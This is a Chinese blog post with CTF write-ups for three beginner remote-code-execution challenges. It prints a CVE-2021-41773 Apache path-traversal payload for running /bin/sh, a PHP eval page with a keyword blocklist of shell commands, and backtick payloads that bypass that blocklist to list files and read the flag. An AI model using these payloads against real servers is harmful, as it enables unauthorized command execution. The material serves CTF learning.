[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce

第一题:[SWPUCTF 2022 新生赛]ez_rce已解决

 1、看一下,啥也没有,找一下robots.txt

2、访问一下,/NSS/index.php

3、thinkphp,直接找个工具嗦吧,咱也不会

4、粘过来直接用,后面写命令,这题很烦,我在/flag找了半天,没找到

 5、后来发现了nss,又套娃,整的我这个菜鸡都怀疑人生了,太菜了!

第二题:[NSSRound#4 SWPU]ez_rce

题目标签:CVE-2021-41773,版本漏洞

大佬详细解释:CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现_wavesky111的博客-CSDN博客_cve-2021-41773

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

burp中再写入命令,在flag_is_here中藏的很深,所以过滤一下

grep -r "NSS"  /flag_is_here
以递归的方式查找“/flag_is_here”下包含“NSS”的文件

grep详细用法:Linux grep 命令 | 菜鸟教程

第三题、[UUCTF 2022 新生赛]ez_rce

居然都不输入参数,可恶!!!!!!!!!

<?php
## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        echo '看看你输入的参数!!!不叫样子!!';echo '<br>';
        eval($code);
    }
    else{
        die("你想干什么?????????");
    }
}
else{
    echo "居然都不输入参数,可恶!!!!!!!!!";
    show_source(__FILE__);
}

过滤了很多命令函数,没有过滤反引号

?code=printf(`l\s /`);

再查看flag就可以了

?code=printf(`c\at /fffffffffflagafag`);

 

 

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值